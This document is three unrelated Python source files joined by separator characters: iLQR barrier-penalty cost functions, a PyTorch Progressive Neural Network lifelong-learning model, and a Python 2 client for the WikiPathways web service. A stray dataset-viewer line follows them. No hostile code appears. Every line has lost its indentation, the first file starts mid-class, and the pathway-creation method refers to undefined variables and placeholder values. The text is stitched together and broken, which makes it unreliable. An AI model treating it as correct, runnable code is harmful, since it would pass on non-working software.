def updateBarrierFromTrajectory(self,x,u):
oldbc = self.barrierClearance
oldcbc = self.controlBarrierClearance
oldgbc = self.goalBarrierClearance
self.setBarrierFromTrajectory(x,u,firstTime=False)
print("iLQR: clearance on state",self.barrierClearance,"control",self.controlBarrierClearance,"goal",self.goalBarrierClearance)
cold = min(oldbc)
c = min(self.barrierClearance)
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on state constraint, clearance %.3g -> %.3g"%(cold,c))
else:
self.barrierWeight *= 0.5
print("iLQR: Stayed feasible on state constraint, sharpening constraint to %0.3g"%(self.barrierWeight,))
else:
if cold < 0:
self.barrierWeight *= 2.5
print("iLQR: Stayed infeasible on state constraint, diffusing constraint to %0.3g"%(self.barrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on state constraint, clearance %.3g -> %.3g"%(cold,c))
cold = oldcbc
c = self.controlBarrierClearance
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on control constraint, clearance %.3g -> %.3g"%(cold,c))
else:
self.controlBarrierWeight *= 0.5
print("iLQR: Stayed feasible on control constraint, sharpening constraint to %0.3g"%(self.controlBarrierWeight,))
else:
if cold < 0:
self.controlBarrierWeight *= 2.5
print("iLQR: Stayed infeasible on control constraint, diffusing constraint to %0.3g"%(self.controlBarrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on control constraint, clearance %.3g -> %.3g"%(cold,c))
cold = oldgbc
c = self.goalBarrierClearance
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on goal constraint, clearance %.3g -> %.3g"%(cold,c))
else:
self.goalBarrierWeight *= 0.5
print("iLQR: Stayed feasible on goal constraint, sharpening constraint to %0.3g"%(self.goalBarrierWeight,))
else:
if cold < 0:
self.goalBarrierWeight *= 2.5
print("iLQR: Stayed infeasible on goal constraint, diffusing constraint to %0.3g"%(self.goalBarrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on goal constraint, clearance %.3g -> %.3g"%(cold,c))
def barrierFn(self,c):
if self.barrierType == 'inv':
if c <= 0: return float('inf')
return 1.0/c
elif self.barrierType == 'log':
if c <= 0: return float('inf')
if math.isinf(c): return 0
return -math.log(c)
elif self.barrierType == 'square':
if c < 0: return c**2
return 0
else:
raise ValueError("Invalid barrier function")
def barrierDeriv(self,c):
if self.barrierType == 'inv':
if c <= 0: dc = 0.0
else: dc= -1.0/c**2
elif self.barrierType == 'log':
if c <= 0: dc = 0.0
elif math.isinf(c): dc = 0.0
else: dc = -1.0/c
elif self.barrierType == 'square':
if c < 0: dc = 2*c
else: dc = 0
return dc
def barrierDeriv2(self,c):
if self.barrierType == 'inv':
if c <= 0: dc = 0.0
else: dc= 2.0/c**3
elif self.barrierType == 'log':
if c <= 0: dc = 0.0
elif math.isinf(c): dc = 0.0
else: dc = 1.0/c**2
elif self.barrierType == 'square':
if c < 0: dc = 2
else: dc = 0
return dc
def barrier(self,x):
c = self.cspace.clearance(x) - self.barrierShift
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierFn(v) for v in c)
else:
return self.barrierWeight*self.barrierFn(c)
def barrier_gradient(self,x):
c = self.cspace.clearance(x) - self.barrierShift
g = self.cspace.clearance_gradient(x)
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierDeriv(v)*gi for v,gi in zip(c,g))
else:
return self.barrierWeight*self.barrierDeriv(c)*g
def barrier_hessian(self,x):
c = self.cspace.clearance(x) - self.barrierShift
g = self.cspace.clearance_gradient(x)
if hasattr(c,'__iter__'):
return self.barrierWeight*sum(self.barrierDeriv2(v)*np.outer(gi,gi) for v,gi in zip(c,g))
else:
return self.barrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def controlBarrier(self,x,u):
if self.controlSpace is None: return 0.0
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
if U.signedDistance(u) <= 0:
assert U.contains(u),"Control set %s signed distance %f but doesn't contain %s"%(str(U),U.signedDistance(u),str(u))
else:
assert not U.contains(u),"Control set %s signed distance %f but contains %s"%(str(U),U.signedDistance(u),str(u))
return self.controlBarrierWeight*self.barrierFn(c)
def controlBarrier_gradient(self,x,u):
if self.controlSpace is None: return None
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
g = -U.signedDistance_gradient(u)
return self.controlBarrierWeight*self.barrierDeriv(c)*g
def controlBarrier_hessian(self,x,u):
if self.controlSpace is None: return None
U = self.controlSpace.controlSet(x)
c = -U.signedDistance(u) - self.controlBarrierShift
g = -U.signedDistance_gradient(u)
return self.controlBarrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def goalBarrier(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
return self.goalBarrierWeight*self.barrierFn(c)
def goalBarrier_gradient(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
g = -self.goalSet.signedDistance_gradient(x)
return self.goalBarrierWeight*self.barrierDeriv(c)*g
def goalBarrier_hessian(self,x):
c = -self.goalSet.signedDistance(x) - self.goalBarrierShift
g = -self.goalSet.signedDistance_gradient(x)
return self.goalBarrierWeight*self.barrierDeriv2(c)*np.outer(g,g)
def incremental(self,x,u=None):
res = self.base.incremental(x,u)+self.barrier(x)
if u is not None and self.controlSpace is not None:
res += self.controlBarrier(x,u)
return res
def terminal(self,x):
if self.goalSet is not None:
return self.base.terminal(x)+self.goalBarrier(x)+self.barrier(x)
return self.base.terminal(x)+self.barrier(x)
"""
def incremental_gradient(self,x,u):
return self.incremental_gradient_diff(x,u)
def incremental_hessian(self,x,u):
return self.incremental_hessian_diff(x,u)
def terminal_gradient(self,x):
return self.terminal_gradient_diff(x)
def terminal_hessian(self,x):
return self.terminal_hessian_diff(x)
"""
def incremental_gradient(self,x,u):
bx,bu = self.base.incremental_gradient(x,u)
if u is not None and self.controlSpace is not None:
bu += self.controlBarrier_gradient(x,u)
return bx+self.barrier_gradient(x),bu
def incremental_hessian(self,x,u):
Hx,Hxu,Hu = self.base.incremental_hessian(x,u)
if u is not None and self.controlSpace is not None:
Hu += self.controlBarrier_hessian(x,u)
return Hx+self.barrier_hessian(x),Hxu,Hu
def terminal_gradient(self,x):
if self.goalSet is not None:
return self.base.terminal_gradient(x)+self.goalBarrier_gradient(x)+self.barrier_gradient(x)
return self.base.terminal_gradient(x)+self.barrier_gradient(x)
def terminal_hessian(self,x):
if self.goalSet is not None:
return self.base.terminal_hessian(x)+self.goalBarrier_hessian(x)+self.barrier_hessian(x)
return self.base.terminal_hessian(x)+self.barrier_hessian(x)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.models.ll_model import LifelongLearningModel
class PNNLinearBlock(nn.Module):
def __init__(self, in_sizes, out_size, scalar_mult=1.0, split_v=False):
super(PNNLinearBlock, self).__init__()
assert isinstance(in_sizes, (list, tuple))
self.split_v = split_v
self.in_sizes = in_sizes
self.w = nn.Linear(in_sizes[-1], out_size)
if len(in_sizes) > 1:
self.alphas = nn.ParameterList()
for i in range(len(in_sizes) - 1):
new_alpha = torch.tensor([scalar_mult])#.expand(in_size)
self.alphas.append(nn.Parameter(new_alpha))
if split_v:
self.v = nn.ModuleList([nn.Linear(in_size, in_sizes[-1]) for in_size in in_sizes[:-1]])
else:
v_in_size = sum(in_sizes[:-1])
self.v = nn.Linear(v_in_size, in_sizes[-1])
self.u = nn.Linear(in_sizes[-1], out_size)
def forward(self, inputs):
if not isinstance(inputs, list):
inputs = [inputs]
out = self.w(inputs[-1])
if len(inputs) > 1:
prev_columns_out = []
for x, alpha in zip(inputs, self.alphas):
prev_columns_out.append(alpha * x)
if self.split_v:
prev_columns_out = [v(x) for v, x in zip(self.v, prev_columns_out)]
prev_columns_out = sum(prev_columns_out)
else:
prev_columns_out = torch.cat(prev_columns_out, dim=1)
prev_columns_out = self.v(prev_columns_out)
out += self.u(F.relu(prev_columns_out))
return out
class PNN(nn.Module):
def __init__(self, columns):
super(PNN, self).__init__()
self.columns = columns
def forward(self, x, task_id=-1):
assert self.columns, 'PNN should at least have one column ' \
'(missing call to `new_task` ?)'
inputs = [c[0](x) for c in self.columns]
for l in range(1, len(self.columns[0])):
inputs = list(map(F.relu, inputs))
outputs = []
#TODO: Use task_id to check if all columns are necessary
for i, column in enumerate(self.columns):
outputs.append(column[l](inputs[:i+1]))
inputs = outputs
return inputs[task_id]
def freeze_columns(self, skip=None):
if skip == None:
skip = []
for i, c in enumerate(self.columns):
for params in c.parameters():
params.requires_grad = i in skip
# def parameters(self, col=-1):
# # if col is None:
# # return super(PNN, self).parameters()
#
# return self.columns[col].parameters()
class PNN_LLmodel(LifelongLearningModel):
def __init__(self, split_v, *args, **kwargs):
super(PNN_LLmodel, self).__init__(*args, **kwargs)
self.split_v = split_v
self.columns = []
def _new_model(self, x_dim, n_classes, task_id, **kwargs):
msg = "Should have the out size for each layer + input size " \
"(got {} sizes but {} layers)."
sizes = self.get_sizes(x_dim, n_classes)
# assert len(sizes) == self.n_layers + 1, msg.format(len(sizes),
# self.n_layers)
assert task_id == len(self.columns)
new_column = nn.ModuleList([])
new_column.append(PNNLinearBlock([sizes[0]], sizes[1],
split_v=self.split_v))
for i in range(1, len(sizes)-1):
new_column.append(
PNNLinearBlock([sizes[i]] * (task_id + 1), sizes[i + 1],
split_v=self.split_v))
self.columns.append(new_column)
model = PNN(nn.ModuleList(self.columns))
model.n_out = 1
return model
def get_model(self, task_id, *args, **kwargs):
model = super().get_model(task_id, *args, **kwargs)
assert len(model.columns) == task_id + 1
model.freeze_columns(skip=[task_id])
return model
def finish_task(self, dataset, task_id, viz=None):
self.get_model(task_id).freeze_columns() |
import base64
import csv
import getpass
try:
import lxml
except Exception:
print 'library lxml not supported. WikiPathways and LineageProfiler visualization will not work. Please install with pip install lxml.'
from lxml import etree as ET
from lxml import _elementpath
import re
try: import requests
except Exception:
print 'library requests not supported. WikiPathways and LineageProfiler visualization will not work. Please install with pip install requests.'
import sys
class WikipathwaysApiClient(object):
"""Returns :class:`WikipathwaysApiClient` object.
:param identifier: WikiPathways ID for the new :class:`WikipathwaysApiClient` object.
"""
def __invert_dict(dictionary):
return dict((v, k) for k, v in dictionary.iteritems())
def __get_bridgedb_datasets(self):
if hasattr(self, 'bridgedb_datasets'):
bridgedb_datasets = self.bridgedb_datasets
else:
bridgedb_datasets_request = requests.get('https://raw.githubusercontent.com/bridgedb/BridgeDb/master/org.bridgedb.bio/resources/org/bridgedb/bio/datasources.txt')
bridgedb_datasets_string = bridgedb_datasets_request.text
bridgedb_datasets_csv = csv.reader(bridgedb_datasets_string.split('\n'), delimiter='\t')
bridgedb_datasets_parsed = [];
for bridgedb_dataset_csv in bridgedb_datasets_csv:
if bridgedb_dataset_csv:
bridgedb_dataset_parsed = {}
bridgedb_dataset_parsed['system_code'] = bridgedb_dataset_csv[1]
bridgedb_dataset_parsed['miriam'] = bridgedb_dataset_csv[8]
bridgedb_datasets_parsed.append(bridgedb_dataset_parsed)
self.bridgedb_datasets = bridgedb_datasets_parsed
return self.bridgedb_datasets
def __parse_identifiers_iri(self, iri):
iri_components = iri.split('identifiers.org')
iri_path = iri_components[len(iri_components) - 1]
iri_path_components = iri_path.split('/')
preferred_prefix = iri_path_components[1]
identifier = iri_path_components[2]
bridgedb_datasets = self.__get_bridgedb_datasets()
for bridgedb_dataset in bridgedb_datasets:
if 'urn:miriam:' + preferred_prefix == bridgedb_dataset['miriam']:
system_code = bridgedb_dataset['system_code']
return {
'preferred_prefix': preferred_prefix,
'identifier': identifier,
'system_code': system_code
}
api_to_standard_term_mappings = {
'id': 'identifier',
'ids': 'identifiers',
'pwId': 'identifier',
'revision': 'version',
'graphId': 'element_identifiers',
'color': 'colors',
'fileType': 'file_format',
'species': 'organism',
'url': 'web_page',
'codes': 'system_codes'
}
filename_extension_to_media_type_mappings = {
'svg': 'image/svg+xml',
'png': 'image/png',
'pdf': 'application/pdf',
'gpml': 'application/gpml+xml',
'txt': 'text/vnd.genelist+tab-separated-values',
'pwf': 'text/vnd.eu.gene+plain',
'owl': 'application/vnd.biopax.owl+xml',
}
filename_extensions = filename_extension_to_media_type_mappings.keys()
media_types = filename_extension_to_media_type_mappings.values()
media_type_to_filename_extension_mappings = __invert_dict(filename_extension_to_media_type_mappings)
english_name_to_iri_mappings = {
'African malaria mosquito': 'http://identifiers.org/taxonomy/7165',
'beet': 'http://identifiers.org/taxonomy/161934',
'thale cress': 'http://identifiers.org/taxonomy/3702',
'cattle': 'http://identifiers.org/taxonomy/9913',
'roundworm': 'http://identifiers.org/taxonomy/6239',
'dog': 'http://identifiers.org/taxonomy/9615',
'sea vase': 'http://identifiers.org/taxonomy/7719',
'zebrafish': 'http://identifiers.org/taxonomy/7955',
'fruit fly': 'http://identifiers.org/taxonomy/7227',
'Escherichia coli': 'http://identifiers.org/taxonomy/562',
'horse': 'http://identifiers.org/taxonomy/9796',
'chicken': 'http://identifiers.org/taxonomy/9031',
'soybean': 'http://identifiers.org/taxonomy/3847',
'human': 'http://identifiers.org/taxonomy/9606',
'barley': 'http://identifiers.org/taxonomy/4513',
'Rhesus monkey': 'http://identifiers.org/taxonomy/9544',
'mouse': 'http://identifiers.org/taxonomy/10090',
'platypus': 'http://identifiers.org/taxonomy/9258',
'long-grained rice': 'http://identifiers.org/taxonomy/39946',
'rice': 'http://identifiers.org/taxonomy/4530',
'black cottonwood': 'http://identifiers.org/taxonomy/3694',
'chimpanzee': 'http://identifiers.org/taxonomy/9598',
'Norway rat': 'http://identifiers.org/taxonomy/10116',
'baker\'s yeast': 'http://identifiers.org/taxonomy/4932',
'tomato': 'http://identifiers.org/taxonomy/4081',
'pig': 'http://identifiers.org/taxonomy/9823',
'wine grape': 'http://identifiers.org/taxonomy/29760',
'western clawed frog': 'http://identifiers.org/taxonomy/8364',
'maize': 'http://identifiers.org/taxonomy/4577'
}
iri_to_english_name_mappings = __invert_dict(english_name_to_iri_mappings)
latin_name_to_iri_mappings = {
'Anopheles gambiae': 'http://identifiers.org/taxonomy/7165',
'Arabidopsis thaliana': 'http://identifiers.org/taxonomy/3702',
'Aspergillus niger': 'http://identifiers.org/taxonomy/5061',
'Bacillus subtilis': 'http://identifiers.org/taxonomy/1423',
'Beta vulgaris': 'http://identifiers.org/taxonomy/161934',
'Bos taurus': 'http://identifiers.org/taxonomy/9913',
'Caenorhabditis elegans': 'http://identifiers.org/taxonomy/6239',
'Canis familiaris': 'http://identifiers.org/taxonomy/9615',
'Ciona intestinalis': 'http://identifiers.org/taxonomy/7719',
'Ruminiclostridium thermocellum': 'http://identifiers.org/taxonomy/1515',
'Clostridium thermocellum': 'http://identifiers.org/taxonomy/1515',
'<NAME>': 'http://identifiers.org/taxonomy/7955',
'Drosophila melanogaster': 'http://identifiers.org/taxonomy/7227',
'Escherichia coli': 'http://identifiers.org/taxonomy/562',
'Equus caballus': 'http://identifiers.org/taxonomy/9796',
'Gallus gallus': 'http://identifiers.org/taxonomy/9031',
'Gibberella zeae': 'http://identifiers.org/taxonomy/5518',
'Glycine max': 'http://identifiers.org/taxonomy/3847',
'Homo sapiens': 'http://identifiers.org/taxonomy/9606',
'Hordeum vulgare': 'http://identifiers.org/taxonomy/4513',
'Macaca mulatta': 'http://identifiers.org/taxonomy/9544',
'Mus musculus': 'http://identifiers.org/taxonomy/10090',
'Mycobacterium tuberculosis': 'http://identifiers.org/taxonomy/1773',
'Ornithorhynchus anatinus': 'http://identifiers.org/taxonomy/9258',
'Oryza indica': 'http://identifiers.org/taxonomy/39946',
'Oryza sativa': 'http://identifiers.org/taxonomy/4530',
'Oryza sativa Indica Group': 'http://identifiers.org/taxonomy/39946',
'Populus trichocarpa': 'http://identifiers.org/taxonomy/3694',
'Pan troglodytes': 'http://identifiers.org/taxonomy/9598',
'Rattus norvegicus': 'http://identifiers.org/taxonomy/10116',
'Saccharomyces cerevisiae': 'http://identifiers.org/taxonomy/4932',
'Solanum lycopersicum': 'http://identifiers.org/taxonomy/4081',
'Sus scrofa': 'http://identifiers.org/taxonomy/9823',
'Vitis vinifera': 'http://identifiers.org/taxonomy/29760',
'Xenopus tropicalis': 'http://identifiers.org/taxonomy/8364',
'Zea mays': 'http://identifiers.org/taxonomy/4577'
}
def __init__(self, base_iri=None):
if base_iri is None:
base_iri = 'http://webservice.wikipathways.org/'
self.base_iri = base_iri
# define namespaces
self.NAMESPACES = {'ns1':'http://www.wso2.org/php/xsd','ns2':'http://www.wikipathways.org/webservice/'}
def __convert_standard_terms_to_api_terms(self, input_params):
terms_to_convert = self.api_to_standard_term_mappings
standard_terms = terms_to_convert.values()
api_terms = terms_to_convert.keys()
request_params = {}
for key, value in input_params.iteritems():
if (key in standard_terms):
def get_api_term(candidate_api_term):
return self.api_to_standard_term_mappings[candidate_api_term] == key
api_term = filter(get_api_term, api_terms)[0]
request_params[api_term] = input_params[key]
else:
request_params[key] = input_params[key]
return request_params
def __convert_api_terms_to_standard_terms(self, input_object):
terms_to_convert = self.api_to_standard_term_mappings
standard_terms = terms_to_convert.values()
api_terms = terms_to_convert.keys()
output_object = {}
for key, value in input_object.iteritems():
if (key in api_terms):
api_term = terms_to_convert[key]
output_object[api_term] = input_object[key]
else:
output_object[key] = input_object[key]
return output_object
def __convert_organism_to_dict(self, organism):
if hasattr(self, 'organism_dicts'):
organism_dicts = self.organism_dicts
else:
organism_dicts = self.organism_dicts = self.list_organisms()
for organism_dict in organism_dicts:
if isinstance(organism, basestring):
if organism_dict['@id'] == organism:
return organism_dict
elif organism_dict['name']['la'] == organism:
return organism_dict
elif organism_dict['name'].get('en') and organism_dict['name']['en'] == organism:
return organism_dict
elif organism.get('@id') and organism['@id'] == organism_dict['@id']:
return organism_dict
def __enrich_pathway(self, pathway):
pathway['@id'] = 'http://identifiers.org/wikipathways/' + pathway['identifier']
if pathway.get('organism') and isinstance(pathway['organism'], basestring):
pathway['organism'] = self.__convert_organism_to_dict(pathway['organism'])
return pathway
def create_pathway(self):
###
# author: msk (<EMAIL>)
###
# login
pswd = getpass.getpass('Password:')
auth = {'name' : username , 'pass' : <PASSWORD>}
r_login = requests.get(self.base_iri + 'login', params=auth)
dom = ET.fromstring(r_login.text)
authentication = ''
for node in dom.findall('ns1:auth', namespaces):
authentication = node.text
# read gpml file
f = open(gpml_file, 'r')
gpml = f.read()
# create pathway
update_params = {'auth' : username+'-'+authentication, 'gpml': gpml}
re = requests.post(self.base_iri + 'createPathway', params=update_params)
#print re.text
def get_colored_pathway(self, identifier, element_identifiers, colors, version = '0', file_format = 'svg'):
"""Sends a GET request. Returns file as string.
Args:
identifier (str): WikiPathways ID.
element_identifiers (list of str): means of identifying one or more elements in a pathway,
for example, specify GPML GraphIds as ["ffffff90","ffffffe5"].
colors (list of str): one or more hexadecimal number(s), representing the colors to use for
the corresponding element_identifier (if the length of the colors list is equal to the
length of the element_identifiers list) or the single color to use for all element_identifiers
(if the colors list is not equal in length to the element_identifiers list).
Example: ["#0000FF","#0000FF"].
version (str, optional): The version of the pathway. Defaults to '0', which means latest.
file_format (str): IANA media type (http://www.iana.org/assignments/media-types/media-types.xhtml)
or filename extension desired for response. Defaults to 'svg'. Examples:
Media types:
* 'image/svg+xml'
* 'image/png'
* 'application/pdf'
Filename extensions:
* 'svg'
* 'png'
* 'pdf'
"""
# API does not yet support content-type negotiation, so we need to convert
# filename extension to be used as a query parameter.
if file_format in self.media_types:
file_format = self.media_type_to_filename_extension_mappings[file_format]
# HTML/CSS defaults use a pound sign before the HEX number, e.g. #FFFFFF.
# But the API does not use this, so to make it easier for users, we are
# accepting the pound sign in the input args and stripping it here.
input_colors = colors
colors = []
non_letter_number_pattern = re.compile('[^a-zA-Z0-9]+')
for input_color in input_colors:
color = non_letter_number_pattern.sub('', input_color)
colors.append(color)
input_params = {
'identifier': identifier,
'version': version,
'element_identifiers': element_identifiers,
'colors': colors,
'file_format': file_format
}
request_params = self.__convert_standard_terms_to_api_terms(input_params)
response = requests.get(self.base_iri + 'getColoredPathway', params=request_params)
dom = ET.fromstring(response.text)
node = dom.find('ns1:data', self.NAMESPACES)
file = base64.b64decode(node.text) ### decode this file
return file
def get_pathway_as(self, identifier, version = '0', file_format = 'gpml'):
"""
Sends a GET request. Returns an LXML object for any XML media type
and a string for anything else
Args:
identifier (str): WikiPathways ID.
version (str, optional): The version of the pathway. Defaults to '0', which means latest.
file_format (str): IANA media type (http://www.iana.org/assignments/media-types/media-types.xhtml)
or filename extension desired for response. Defaults to 'gpml'.
Examples:
Media types:
* 'application/gpml+xml'
* 'text/vnd.genelist+tab-separated-values'
* 'text/vnd.eu.gene+plain'
* 'application/vnd.biopax.owl+xml'
* 'image/svg+xml'
* 'image/png'
* 'application/pdf'
Filename extensions:
* 'gpml'
* 'txt'
* 'pwf'
* 'owl'
* 'svg'
* 'png'
* 'pdf'
"""
# API does not yet support content-type negotiation, so we need to convert
# filename extension to be used as a query parameter.
if file_format in self.media_types:
file_format = self.media_type_to_filename_extension_mappings[file_format]
input_params = {
'identifier': identifier,
'version': version,
'file_format': file_format
}
request_params = self.__convert_standard_terms_to_api_terms(input_params)
response = requests.get(self.base_iri + 'getPathwayAs', params=request_params)
#print [response.text];sys.exit()
dom = ET.fromstring(response.text)
node = dom.find('ns1:data', self.NAMESPACES)
response_string = base64.b64decode(node.text) ### decode this file
if request_params['fileType'] == 'gpml' or request_params['fileType'] == 'owl' or request_params['fileType'] == 'svg':
#response = ET.fromstring(response_string)
response = response_string
else:
response = response_string
return response
def get_pathway_info(self, identifier):
"""Sends a GET request. Returns pathway metadata as dict.
Args:
identifier (str): WikiPathways ID.
"""
request_params = {'pwId' : identifier}
response = requests.get(self.base_iri + 'getPathwayInfo', params=request_params)
dom = ET.fromstring(response.text)
pathway_using_api_terms = {}
for node in dom.findall('ns1:pathwayInfo', self.NAMESPACES):
for attribute in node:
pathway_using_api_terms[ET.QName(attribute).localname] = attribute.text
pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
pathway = self.__enrich_pathway(pathway)
return pathway
def find_pathways_by_text(self, query, organism = None):
"""Sends a GET request. Returns pathways as list of dicts.
Args:
query (str): Text to search for.
organism (str or dict, optional): Limit to organism with given name
(Latin or English) or @id (from http://identifiers.org/taxonomy/)
"""
input_params = {}
input_params['query'] = query
if organism:
input_params['organism'] = self.__convert_organism_to_dict(organism)['name']['la']
request_params = self.__convert_standard_terms_to_api_terms(input_params)
response = requests.get(self.base_iri + 'findPathwaysByText', params=request_params)
dom = ET.fromstring(response.text)
pathways = []
for node in dom.findall('ns1:result', self.NAMESPACES):
pathway_using_api_terms = {}
for child in node:
pathway_using_api_terms[ET.QName(child).localname] = child.text
pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
pathway = self.__enrich_pathway(pathway)
pathways.append(pathway)
return pathways
def find_pathways_by_xref(self, **kwargs):
"""Sends a GET request. Returns pathways as a list of dicts.
Required: either just @id or both system_codes and identifiers.
Args:
@id (list of str): One or more identifiers.org IRIs, like ['http://identifiers.org/ncbigene/7040'].
system_codes (list of str): One or more BridgeDb system codes.
identifiers (list of str): One or more entity reference identifiers.
"""
if kwargs.get('@id'):
if not isinstance(kwargs['@id'], list):
kwargs['@id'] = [kwargs['@id']]
system_codes = []
identifiers = []
for iri in kwargs['@id']:
identifiers_iri_components = self.__parse_identifiers_iri(iri)
system_codes.append(identifiers_iri_components['system_code'])
identifiers.append(identifiers_iri_components['identifier'])
input_params = {
'system_codes': system_codes,
'identifiers': identifiers
}
else:
input_params = kwargs
request_params = self.__convert_standard_terms_to_api_terms(input_params)
response = requests.get(self.base_iri + 'findPathwaysByXref', params=request_params)
dom = ET.fromstring(response.text)
pathways = []
for resultNode in dom.findall('ns1:result', self.NAMESPACES):
pathway_using_api_terms = {}
pathway_using_api_terms['fields'] = []
for childNode in resultNode:
if ET.QName(childNode).localname != 'fields':
pathway_using_api_terms[ET.QName(childNode).localname] = childNode.text
elif ET.QName(childNode).localname == 'fields':
field = {}
for fieldChildNode in childNode:
#TODO standardize names & values from fieldChildNode.text
field[ET.QName(fieldChildNode).localname] = fieldChildNode.text
pathway_using_api_terms['fields'].append(field)
pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
pathway = self.__enrich_pathway(pathway)
pathways.append(pathway)
return pathways
def list_organisms(self):
"""Sends a GET request. Returns :list:`organisms` object, each an organism as a dict,
with the IRI, Latin name and English name (when available).
"""
response = requests.get(self.base_iri + 'listOrganisms')
dom = ET.fromstring(response.text)
organisms = []
for node in dom:
try:
organism = {}
organism['@context'] = [
{
'name': {
'@id': 'biopax:name',
'@container': '@language'
},
'Organism': 'http://identifiers.org/snomedct/410607006'
}
]
organism['@type'] = 'Organism'
organism['name'] = {}
organism['name']['la'] = latin_name = node.text
organism['@id'] = self.latin_name_to_iri_mappings[latin_name]
english_name = self.iri_to_english_name_mappings.get(organism['@id'])
if english_name != None:
organism['name']['en'] = english_name
organisms.append(organism)
except Exception:
pass
return organisms
# list pathways
def list_pathways(self, organism):
request_params = {'organism': organism}
response = requests.get(self.base_iri + 'listPathways', params=request_params)
dom = ET.fromstring(response.text)
pathways = []
for pathway_node in dom.findall('ns1:pathways', self.NAMESPACES):
pathway_using_api_terms = {}
for child_node in pathway_node:
pathway_using_api_terms[ET.QName(child_node).localname] = child_node.text
pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
pathway = self.__enrich_pathway(pathway)
pathways.append(pathway)
return pathways
if __name__ == '__main__':
client = WikipathwaysApiClient()
wp_id_data = client.get_pathway_as(file_format = 'gpml',identifier = 'WP254', version = 0)
with open('WP205.gpml', 'a') as file_out:
file_out.write(wp_id_data) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.